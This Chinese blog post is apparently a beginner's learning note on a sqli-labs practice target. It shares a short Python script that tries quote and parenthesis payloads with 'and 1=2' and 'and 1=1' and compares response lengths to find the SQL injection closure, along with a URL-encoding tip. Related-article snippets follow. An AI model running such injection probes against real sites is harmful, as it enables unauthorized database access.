一个关于sql注入寻找闭合的python小脚本

最新推荐文章于 2024-05-23 16:17:43 发布
最新推荐文章于 2024-05-23 16:17:43 发布
阅读量436 收藏
点赞数 1
分类专栏: 编程之路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Alexz__/article/details/100904705
版权

头一天开始学python,在w3c上看了整整一天,第二天就开始对着一个成品的脚本尝试着敲了一个小脚本用来跑闭合的,和老师一起发现了几个关于python里urllib.request模块额问题

代码一直就敲的不是很好,勿喷

上源码

 


import urllib.request


url = ""
url_bihe = "http://192.168.60.129/sqli-labs-master/Less-1/"  #被攻击网页的url

def FindBihe():
    bihe = ['', '%27', '%22', ')', '%27)', '%22)', '))', '%27))', '%22))']
    for i in bihe:
        url_bihe2=url_bihe+"?id=1"+i+"%20and%201=2--+"  
        res=urllib.request.urlopen(url_bihe2)
        length = len(res.read())  #长度一样不解码以提高程序效率
        url_bihe1=url_bihe+"?id=1"+i+"and%201=1--+" 
        res1=urllib.request.urlopen(url_bihe1)
        length1 = len(res1.read())    
        if(length1 != length):
            print('该网页sql注入闭合是'+i)
            return i
            break
            print('匹配失败')
    return i

FindBihe()

 

测试环境Python自带IDLE

需要注意的是,

urllib.request.urlopen函数所接受的URL对格式有着严格的要求,必须把在内的所有空格改为url编码的%20,所测试闭合也要改为相应的编码格式,不然程序会报错

之前就是卡在url这一步,很绝望,所有思路都写好就是报错,十分绝望,看到这篇博客的朋友可以少走点弯路

这里把这个功能添加为一个函数,准备日后找些碎片时间写一个整合的自动化注入脚本

就当对SQL注入更好地理解了吧

 

Alexz__
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
使用Python防止SQL注入攻击的实现示例
09-16
主要介绍了使用Python防止SQL注入攻击的实现示例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Python中防止sql注入的方法详解
09-21
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无...下面这篇文章主要给大家介绍了关于Python中防止sql注入的方法,需要的朋友可以参考下。
sql注入闭合方式
qq_67667368的博客
03-31 2147
由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。MYSQL数据库的包容性比较强,如果你输错了数据的类型,MYSQL数据库会自动将其转换成正确的数据类型,比如输入1)、1"、1-等,只要数字后面的字符不是闭合符的,数据库都会把你输入的错误的数据转换成正确的数据类型。
(学习笔记)SQL注入--基础篇
peanut5036的博客
02-16 1248
SQL注入自学笔记,适合小白,包括union注入,报错注入,与盲注
手把手教你用Python轻松玩转SQL注入
最新发布
菜鸟学识的博客
05-23 1197
大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。总的来说,SQL注入无非就是一段艰难险阻的路程,你可以发现但是别人也可以防御,虽然你发现要比较久的时间,但是人家防御却是很轻松,个人觉得得不偿失,不建议大家深入了解,只是做个简单的介绍了解下就好,至少你搜索技能因此而提高了不少吧。
sql注入基础原理及注入方式
A906003660的博客
07-20 1180
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
SQL注入原理及如何判断闭合
热门推荐
大大大蜜蜂的博客
09-30 1万+
一、SQL注入原理: 造成SQL注入的原因: 在没有对用户的输入进行过滤、检测的情况下,就把用户输入数据,带入到数据库中执行SQL语句。 利用SQL注入: 由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。 访问网页具体流程图: 在上图中,用户访问实验楼主页进行了如下过程: 1、在 Web 浏览器中输入 www.shiya
关于sql语句的闭合方式
qq_41631806的博客
04-11 7344
关于sql语句的闭合方式 前言 以前一直以为字符型的SQL语句只能用单引号或双引号闭合,数值型可以不用闭合。以为php的SQL语句能用括号闭合是因为PHP的特性。自己的基础实在不行。以下数据库类型均为mysql 准备: 建一张包含数值型和字符型字段的表,并插入数据。 create table test (id int ,name varchar(10)); 准备: 建一张包含数值型和字符型字...
python+Django实现防止SQL注入的办法
01-02
先看看那种容易被注入SQL id = 11001 sql = SELECT id, name, age FROM student WHERE id = +id+ cursor = connection.cursor() try: cursor.execute(sql) result = cursor.fetchall() for ...
基于Python的自动化SQL注入工具开发
04-29
人、组织乃至国家的信息安全成为了网络安全领域研究的一个重要问题。同时我们 要注意到,研究SOL漏洞的检测和利用技术有助于帮助网络安全从业者更有针对性 的防范SQL注入攻击,具有相当的理论意义和现实意义。 论文...
SQL住入原始脚本_SQL注入python脚本_
10-03
SQLmap是一个自动化工具,专门用于检测和利用SQL注入漏洞。它支持多种数据库类型,包括MySQL、PostgreSQL、Oracle等,并且可以执行各种类型的SQL注入攻击。在提供的压缩文件中,`less14_exp.py`, `less9_exp.py`, `...
pikachu靶场之SQL注入
2303_79340715的博客
03-17 1969
个人觉得SQL注入还是挺难的,关键点在于找SQL语句的闭合,文章会比较长,要是能一关一关对着看的话,会对你有不少好处滴!!!当然啦,手搓重要,学会用sqlmap也是挺重要的哦,主要是我还不会~爆账号密码之类的信息再插一句:设置靶场的人已经告诉我们数据库是mysql了。
sql注入-如何判断闭合类型
2202_75361164的博客
05-28 310
b.若只有 ‘ 错误则最内层为 ’ ‘,若只有“ 错误则最内层为 ”"。(其中 ' 和 "如果有则两个只能出现其中一个且只能出现一次,即在最内层)c.若全错,则最内层为(),且如果有外围也只能是()。(自己用MySQL测的,单引号和双引号只能在括号内)a. 过滤\且没有报错,先用 ’ ,看是否错误,再用 “ ,看是否错误,最后用 ) ,看是否错误,过滤\但是没有报错,用 ' 再用 " ,看报错内容就行了。没有过滤\且报错,直接用\,看报错内容就行了。d.之后只需测外围有几层()就行了。
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1362
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入
sql注入的学习
weixin_71008408的博客
01-28 1157
然后我们继续猜,但是要动脑子去猜,如果说他有几十列,我们不可能挨个去试,所以人还是要多读书,此时,我们就可以采取二分法,我们往大的猜,一半一半的缩小范围,专业又高效,但是这里并不是直接去更改select后的数字,而是利用数据库本身的代码order by(排序)去钻个空子。3.获取数据库,表名,列名,因为我们想要拿到管理员的账号密码,所以我们需要找到账号密码的存放位置,而在这之前,我们就要想办法找到表名,列名,而获取的的方法就是 猜。这样我们就拿到一些关键信息,username,password。
sql注入:延时注入python万能脚本
一个努力学习网安的小牛马
11-08 254
【代码】sql注入:延时注入python脚本
SQL注入闭合方式及万能密码
西电卢本伟的博客
03-24 2559
由万能公式想到的...请求方式GET请求POST请求SQL注入闭合方式数字型字符型再看sqli-labs实验万能密码 请求方式 两种 HTTP 请求方法:GET 和 POST 在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST。 ● GET - 从指定的资源请求数据。 ● POST - 向指定的资源提交要被处理的数据 GET请求 个人理解get请求其实就是通过URL来传递数据。 一个标准的URL网址,在最后有一个querystring部分,表示对页面查询,用?来表示这部分,内
SQL注入-关于注入闭合的问题(数据库是MySQL
qq_36896220的博客
06-29 6444
当前正在学习渗透方面的知识,记录一下学习上面的体会。 关于怎么构造输入来让符号闭合其实一直都没怎么搞懂,也就导致了给我一个URL从一开始就不知道怎么做了,缺乏一个解题的思路。在网上也查了很多怎么找注入点的方法,基本上就告诉你一个一个的去试各种符号,从出错的信息中找,但我觉得要想有一个清楚的概念必须从根源出发。于是我在想,构造输入不就是把我写的东西写入进SQL语句中让后台数据库执行的嘛,那么我直接...
python实现一个sql注入漏洞的检测工具
04-24
可以使用Python中的一些模块和库来实现一个SQL注入漏洞检测工具。具体步骤如下: 1. 编写一个程序从用户输入中获取SQL查询,这个程序需要能够处理输入的字符串,并将其转换为SQL查询。 2. 使用SQLAlchemy模块将SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值